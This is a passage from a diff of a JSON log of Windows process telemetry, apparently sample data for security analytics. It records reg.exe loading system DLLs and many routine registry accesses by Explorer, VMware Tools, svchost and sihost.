"{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6700, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571316360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883571421830000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883571447460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": 
"Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883571447460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571449020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - 
"process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883571467310016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA314B055", - "registry_value": "41C64E6DA314B055", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", - "registry_value": "{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - 
"process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": 
"sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - 
"registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - 
"unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": 
"sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - 
"registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_value": "HostActivityManager", - "timestamp": 131883571688710000, - "unique_pid": 
"{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", - "registry_value": "Volatile", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 